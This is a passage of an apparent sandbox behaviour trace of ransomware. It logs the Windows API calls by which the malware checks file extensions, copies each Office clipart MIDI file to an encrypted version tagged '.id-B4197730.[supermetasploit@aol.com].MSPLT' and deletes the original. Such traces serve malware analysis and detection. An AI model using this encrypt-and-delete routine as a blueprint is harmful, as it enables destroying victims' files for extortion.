Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HTECH_01.MID") returned 68 [0319.481] lstrlenW (lpString=".doc") returned 4 [0319.481] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0319.481] lstrlenW (lpString=".docx") returned 5 [0319.481] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1 [0319.481] lstrlenW (lpString=".pdf") returned 4 [0319.481] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0319.481] lstrlenW (lpString=".xls") returned 4 [0319.481] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0319.481] lstrlenW (lpString=".xlsx") returned 5 [0319.481] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1 [0319.481] lstrlenW (lpString=".ppt") returned 4 [0319.482] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0319.482] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HTECH_01.MID") returned 68 [0319.482] lstrlenW (lpString=".zip") returned 4 [0319.482] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0319.482] lstrlenW (lpString=".rar") returned 4 [0319.482] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0319.482] lstrlenW (lpString=".bz2") returned 4 [0319.482] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0319.482] lstrlenW (lpString=".7z") returned 3 [0319.482] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0319.482] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HTECH_01.MID") returned 68 [0319.482] lstrlenW (lpString=".dbf") returned 4 [0319.482] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0319.482] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HTECH_01.MID") returned 68 [0319.482] lstrlenW (lpString=".1cd") returned 4 [0319.482] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0319.482] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HTECH_01.MID") returned 68 [0319.482] lstrlenW (lpString=".jpg") returned 4 [0319.482] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0319.482] lstrcmpiW (lpString1=".MID", lpString2=".MSPLT") returned -1 [0319.482] lstrlenW (lpString="JAVA_01.MID") returned 11 [0319.483] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\JAVA_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\java_01.mid"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x534 [0319.513] GetFileSizeEx (in: hFile=0x534, lpFileSize=0x335ff14 | out: lpFileSize=0x335ff14*=9797) returned 1 [0319.514] CloseHandle (hObject=0x534) returned 1 [0319.514] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\JAVA_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\java_01.mid")) returned 0x220 [0319.514] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\JAVA_01.MID.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\java_01.mid.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0319.514] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\JAVA_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\java_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x534 [0319.530] SetFilePointerEx (in: hFile=0x534, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x335fec0 | out: lpNewFilePointer=0x0) returned 1 [0319.531] SetFilePointerEx (in: hFile=0x534, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x335fec0 | out: lpNewFilePointer=0x0) returned 1 [0319.531] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\JAVA_01.MID.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\java_01.mid.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x548 [0319.532] GetLastError () returned 0x0 [0319.532] ReadFile (in: hFile=0x534, lpBuffer=0x3ca8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x335fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesRead=0x335fecc*=0x2645, lpOverlapped=0x0) returned 1 [0319.540] WriteFile (in: hFile=0x548, lpBuffer=0x3ca8020*, nNumberOfBytesToWrite=0x2650, lpNumberOfBytesWritten=0x335fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesWritten=0x335fc94*=0x2650, lpOverlapped=0x0) returned 1 [0319.542] ReadFile (in: hFile=0x534, lpBuffer=0x3ca8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x335fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesRead=0x335fecc*=0x0, lpOverlapped=0x0) returned 1 [0319.542] WriteFile (in: hFile=0x548, lpBuffer=0x3ca8020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x335fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesWritten=0x335fc94*=0xea, lpOverlapped=0x0) returned 1 [0319.542] SetEndOfFile (hFile=0x548) returned 1 [0319.542] CloseHandle (hObject=0x548) returned 1 [0319.542] SetFilePointerEx (in: hFile=0x534, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x335fec0 | out: lpNewFilePointer=0x0) returned 1 [0319.542] SetEndOfFile (hFile=0x534) returned 1 [0319.546] CloseHandle (hObject=0x534) returned 1 [0319.546] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\JAVA_01.MID.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0319.547] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\JAVA_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\java_01.mid")) returned 1 [0319.548] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\JAVA_01.MID") returned 67 [0319.548] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\JAVA_01.MID") returned 67 [0319.548] lstrlenW (lpString=".doc") returned 4 [0319.548] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0319.548] lstrlenW (lpString=".docx") returned 5 [0319.548] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1 [0319.548] lstrlenW (lpString=".pdf") returned 4 [0319.548] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0319.548] lstrlenW (lpString=".xls") returned 4 [0319.548] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0319.548] lstrlenW (lpString=".xlsx") returned 5 [0319.548] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1 [0319.548] lstrlenW (lpString=".ppt") returned 4 [0319.548] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0319.548] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\JAVA_01.MID") returned 67 [0319.548] lstrlenW (lpString=".zip") returned 4 [0319.549] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0319.549] lstrlenW (lpString=".rar") returned 4 [0319.549] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0319.549] lstrlenW (lpString=".bz2") returned 4 [0319.549] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0319.549] lstrlenW (lpString=".7z") returned 3 [0319.549] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0319.549] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\JAVA_01.MID") returned 67 [0319.549] lstrlenW (lpString=".dbf") returned 4 [0319.549] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0319.549] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\JAVA_01.MID") returned 67 [0319.549] lstrlenW (lpString=".1cd") returned 4 [0319.549] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0319.549] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\JAVA_01.MID") returned 67 [0319.549] lstrlenW (lpString=".jpg") returned 4 [0319.549] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0319.549] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\JAVA_01.MID") returned 67 [0319.549] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\JAVA_01.MID") returned 67 [0319.550] lstrlenW (lpString=".doc") returned 4 [0319.550] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0319.550] lstrlenW (lpString=".docx") returned 5 [0319.550] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1 [0319.550] lstrlenW (lpString=".pdf") returned 4 [0319.550] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0319.550] lstrlenW (lpString=".xls") returned 4 [0319.550] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0319.550] lstrlenW (lpString=".xlsx") returned 5 [0319.550] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1 [0319.550] lstrlenW (lpString=".ppt") returned 4 [0319.550] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0319.550] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\JAVA_01.MID") returned 67 [0319.550] lstrlenW (lpString=".zip") returned 4 [0319.550] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0319.550] lstrlenW (lpString=".rar") returned 4 [0319.550] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0319.550] lstrlenW (lpString=".bz2") returned 4 [0319.551] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0319.551] lstrlenW (lpString=".7z") returned 3 [0319.551] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0319.551] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\JAVA_01.MID") returned 67 [0319.551] lstrlenW (lpString=".dbf") returned 4 [0319.551] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0319.551] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\JAVA_01.MID") returned 67 [0319.551] lstrlenW (lpString=".1cd") returned 4 [0319.551] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0319.551] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\JAVA_01.MID") returned 67 [0319.551] lstrlenW (lpString=".jpg") returned 4 [0319.551] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0319.551] lstrcmpiW (lpString1=".MID", lpString2=".MSPLT") returned -1 [0319.551] lstrlenW (lpString="JNGLE_01.MID") returned 12 [0319.552] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\JNGLE_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\jngle_01.mid"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x51c [0319.940] GetFileSizeEx (in: hFile=0x51c, lpFileSize=0x335ff14 | out: lpFileSize=0x335ff14*=5843) returned 1 [0319.940] CloseHandle (hObject=0x51c) returned 1 [0319.940] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\JNGLE_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\jngle_01.mid")) returned 0x220 [0319.940] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\JNGLE_01.MID.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\jngle_01.mid.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0319.941] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\JNGLE_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\jngle_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x51c [0319.941] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x335fec0 | out: lpNewFilePointer=0x0) returned 1 [0319.941] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x335fec0 | out: lpNewFilePointer=0x0) returned 1 [0319.941] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\JNGLE_01.MID.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\jngle_01.mid.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e4 [0319.942] GetLastError () returned 0x0 [0319.942] ReadFile (in: hFile=0x51c, lpBuffer=0x3ca8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x335fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesRead=0x335fecc*=0x16d3, lpOverlapped=0x0) returned 1 [0320.121] WriteFile (in: hFile=0x3e4, lpBuffer=0x3ca8020*, nNumberOfBytesToWrite=0x16e0, lpNumberOfBytesWritten=0x335fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesWritten=0x335fc94*=0x16e0, lpOverlapped=0x0) returned 1 [0320.122] ReadFile (in: hFile=0x51c, lpBuffer=0x3ca8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x335fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesRead=0x335fecc*=0x0, lpOverlapped=0x0) returned 1 [0320.123] WriteFile (in: hFile=0x3e4, lpBuffer=0x3ca8020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x335fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesWritten=0x335fc94*=0xec, lpOverlapped=0x0) returned 1 [0320.123] SetEndOfFile (hFile=0x3e4) returned 1 [0320.123] CloseHandle (hObject=0x3e4) returned 1 [0320.123] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x335fec0 | out: lpNewFilePointer=0x0) returned 1 [0320.123] SetEndOfFile (hFile=0x51c) returned 1 [0320.127] CloseHandle (hObject=0x51c) returned 1 [0320.127] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\JNGLE_01.MID.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0320.495] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\JNGLE_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\jngle_01.mid")) returned 1 [0320.496] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\JNGLE_01.MID") returned 68 [0320.496] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\JNGLE_01.MID") returned 68 [0320.496] lstrlenW (lpString=".doc") returned 4 [0320.496] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0320.496] lstrlenW (lpString=".docx") returned 5 [0320.496] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1 [0320.496] lstrlenW (lpString=".pdf") returned 4 [0320.496] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0320.496] lstrlenW (lpString=".xls") returned 4 [0320.497] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0320.497] lstrlenW (lpString=".xlsx") returned 5 [0320.497] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1 [0320.497] lstrlenW (lpString=".ppt") returned 4 [0320.497] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0320.497] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\JNGLE_01.MID") returned 68 [0320.497] lstrlenW (lpString=".zip") returned 4 [0320.497] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0320.497] lstrlenW (lpString=".rar") returned 4 [0320.497] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0320.497] lstrlenW (lpString=".bz2") returned 4 [0320.497] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0320.497] lstrlenW (lpString=".7z") returned 3 [0320.497] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0320.497] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\JNGLE_01.MID") returned 68 [0320.497] lstrlenW (lpString=".dbf") returned 4 [0320.497] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0320.497] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\JNGLE_01.MID") returned 68 [0320.497] lstrlenW (lpString=".1cd") returned 4 [0320.497] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0320.497] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\JNGLE_01.MID") returned 68 [0320.497] lstrlenW (lpString=".jpg") returned 4 [0320.497] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0320.497] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\JNGLE_01.MID") returned 68 [0320.497] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\JNGLE_01.MID") returned 68 [0320.497] lstrlenW (lpString=".doc") returned 4 [0320.497] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0320.498] lstrlenW (lpString=".docx") returned 5 [0320.498] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1 [0320.498] lstrlenW (lpString=".pdf") returned 4 [0320.498] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0320.498] lstrlenW (lpString=".xls") returned 4 [0320.498] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0320.498] lstrlenW (lpString=".xlsx") returned 5 [0320.498] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1 [0320.498] lstrlenW (lpString=".ppt") returned 4 [0320.498] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0320.498] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\JNGLE_01.MID") returned 68 [0320.498] lstrlenW (lpString=".zip") returned 4 [0320.498] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0320.498] lstrlenW (lpString=".rar") returned 4 [0320.498] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0320.498] lstrlenW (lpString=".bz2") returned 4 [0320.498] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0320.498] lstrlenW (lpString=".7z") returned 3 [0320.498] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0320.498] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\JNGLE_01.MID") returned 68 [0320.498] lstrlenW (lpString=".dbf") returned 4 [0320.498] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0320.498] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\JNGLE_01.MID") returned 68 [0320.498] lstrlenW (lpString=".1cd") returned 4 [0320.498] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0320.499] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\JNGLE_01.MID") returned 68 [0320.499] lstrlenW (lpString=".jpg") returned 4 [0320.499] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0320.499] lstrcmpiW (lpString1=".MID", lpString2=".MSPLT") returned -1 [0320.499] lstrlenW (lpString="PARNT_07.MID") returned 12 [0320.499] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_07.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\parnt_07.mid"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x53c [0320.500] GetFileSizeEx (in: hFile=0x53c, lpFileSize=0x335ff14 | out: lpFileSize=0x335ff14*=6564) returned 1 [0320.500] CloseHandle (hObject=0x53c) returned 1 [0320.500] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_07.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\parnt_07.mid")) returned 0x220 [0320.500] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_07.MID.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\parnt_07.mid.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0320.501] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_07.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\parnt_07.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x53c [0320.501] SetFilePointerEx (in: hFile=0x53c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x335fec0 | out: lpNewFilePointer=0x0) returned 1 [0320.501] SetFilePointerEx (in: hFile=0x53c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x335fec0 | out: lpNewFilePointer=0x0) returned 1 [0320.501] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_07.MID.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\parnt_07.mid.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x52c [0320.503] GetLastError () returned 0x0 [0320.503] ReadFile (in: hFile=0x53c, lpBuffer=0x3ca8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x335fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesRead=0x335fecc*=0x19a4, lpOverlapped=0x0) returned 1 [0320.506] WriteFile (in: hFile=0x52c, lpBuffer=0x3ca8020*, nNumberOfBytesToWrite=0x19b0, lpNumberOfBytesWritten=0x335fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesWritten=0x335fc94*=0x19b0, lpOverlapped=0x0) returned 1 [0320.508] ReadFile (in: hFile=0x53c, lpBuffer=0x3ca8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x335fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesRead=0x335fecc*=0x0, lpOverlapped=0x0) returned 1 [0320.508] WriteFile (in: hFile=0x52c, lpBuffer=0x3ca8020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x335fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesWritten=0x335fc94*=0xec, lpOverlapped=0x0) returned 1 [0320.508] SetEndOfFile (hFile=0x52c) returned 1 [0320.508] CloseHandle (hObject=0x52c) returned 1 [0320.508] SetFilePointerEx (in: hFile=0x53c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x335fec0 | out: lpNewFilePointer=0x0) returned 1 [0320.508] SetEndOfFile (hFile=0x53c) returned 1 [0320.513] CloseHandle (hObject=0x53c) returned 1 [0320.513] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_07.MID.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0320.514] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_07.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\parnt_07.mid")) returned 1 [0320.515] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_07.MID") returned 68 [0320.515] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_07.MID") returned 68 [0320.515] lstrlenW (lpString=".doc") returned 4 [0320.515] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0320.515] lstrlenW (lpString=".docx") returned 5 [0320.515] lstrcmpiW (lpString1=".docx", lpString2="7.MID") returned -1 [0320.515] lstrlenW (lpString=".pdf") returned 4 [0320.515] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0320.515] lstrlenW (lpString=".xls") returned 4 [0320.515] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0320.515] lstrlenW (lpString=".xlsx") returned 5 [0320.515] lstrcmpiW (lpString1=".xlsx", lpString2="7.MID") returned -1 [0320.515] lstrlenW (lpString=".ppt") returned 4 [0320.515] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0320.516] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_07.MID") returned 68 [0320.516] lstrlenW (lpString=".zip") returned 4 [0320.516] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0320.516] lstrlenW (lpString=".rar") returned 4 [0320.516] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0320.516] lstrlenW (lpString=".bz2") returned 4 [0320.516] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0320.516] lstrlenW (lpString=".7z") returned 3 [0320.516] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0320.516] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_07.MID") returned 68 [0320.516] lstrlenW (lpString=".dbf") returned 4 [0320.516] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0320.516] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_07.MID") returned 68 [0320.516] lstrlenW (lpString=".1cd") returned 4 [0320.516] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0320.516] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_07.MID") returned 68 [0320.516] lstrlenW (lpString=".jpg") returned 4 [0320.516] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0320.516] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_07.MID") returned 68 [0320.516] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_07.MID") returned 68 [0320.517] lstrlenW (lpString=".doc") returned 4 [0320.517] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0320.517] lstrlenW (lpString=".docx") returned 5 [0320.517] lstrcmpiW (lpString1=".docx", lpString2="7.MID") returned -1 [0320.517] lstrlenW (lpString=".pdf") returned 4 [0320.517] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0320.517] lstrlenW (lpString=".xls") returned 4 [0320.517] lstrcmpiW (lpString1=".xls", lpString2=".MID") 